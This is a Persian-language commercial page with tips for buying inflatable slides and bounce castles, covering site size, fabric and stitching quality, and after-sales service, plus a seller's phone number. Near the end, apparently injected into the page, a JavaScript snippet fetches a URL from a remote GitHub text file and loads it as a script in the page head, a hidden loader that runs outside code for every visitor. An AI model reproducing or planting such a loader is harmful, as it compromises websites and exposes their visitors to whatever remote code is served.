خرید سرسره بادی
خرید سرسره بادی

خرید سرسره بادی

 • خرید سرسره بادی: سرسره بادی یا قلعه بادی وسیله‌ای است که در پارک‌های بزرگ و اماکن تفریحی، شهربازی یا به تازگی در مهدکودک‌ها استفاده می‌شود و ممکن است در مدل‌های مختلفی یافت شود. این سرسره‌ها معمولاً از جنس پلاستیک یا پلی اتلین هستند، سرسره‌های بادی را می‌توان در ابعاد مختلف پیدا کرد، سازه‌های بادی معمولاً به خاطر محبوبیتشان بین کودکان می‌توانند فضای بازی را جذاب کنند، البته محصولات بادی (سرسره های بادی) در برابر ضربه‌های شدید و اجسام تیز آسیب‌پذیر هستند، پس حتماً باید تمهیداتی در این موضوع در نظر گرفته شود.

  نکاتی برای خرید سرسره بادی

  1. خرید سرسره بادی مناسب با محیط

  اولین نکته ای که برای خرید سرسره بادی باید به آن توجه داشته باشید محیط شماست. در شهر بازی های روباز معمولا گزینه های بیشتری برای خرید انواع سرسره بادی روی میز شماست. لازم به ذکر است که سرسره ها و قصر بادی های کوچک و مهد کودکی مناسب شهربازی های رو باز نیست، و بهتر است از وسایل بزرگتر در یک شهربازی رو باز استفاده شود.

  جهت خرید سرسره بادی برای محیط های سر بسته و کوچک شما نیاز به محاسبه ارتفاع مکان و سفارش سرسره بادی بر اساس نیاز های خود دارید. سرسره های کوچک و با ارتفاع نسبتا پایین تر برای شهربازی های سر بسته و مهد کودک بیشتر پیشنهاد می شود.

  خرید سرسره بادی - 2
  برای خرید روی آگهی کلیک کنید.

  2. توجه به کیفیت پارچه و دوخت

  کیفیت پارچه و دوخت در طول عمر و کیفیت کلی قلعه بادی تاثیر میگذارد. برای مثال در صورتی که پارچه قصر بادی شما از کیفیت پایینی برخوردار باشد، به مرور زمان در اثر ساییدگی، رطوبت، گرما و … پوسیده می شود. پوسیدگی پارچه در اکثر مواقع غیر قابل تعمیر است بنابرین نیاز به تهیه یک سرسره جدید را خواهید داشت.

  3. خدمات پس از فروش

  خدمات پس از فروش برای خرید یک قصر بادی از اهمیت بالایی برخوردار است. خدماتی مانند تعمیرات، گارانتی، استاندارد، خرید لوازم جانبی و … می تواند در دراز مدت در کاهش هزینه ها و افزایش طول عمر سرسره بادی تاثیر گذار باشد. برای همین نیاز است قبل از خرید از هر شرکتی ابتدا خدمات پس از فروش آن را مطالعه و بعد اقدام به خریداری کنید.

  تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن 09127484573 تماس حاصل فرمایید.

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۵ از ۵
  از مجموع ۱ رای

  دیدگاهتان را بنویسید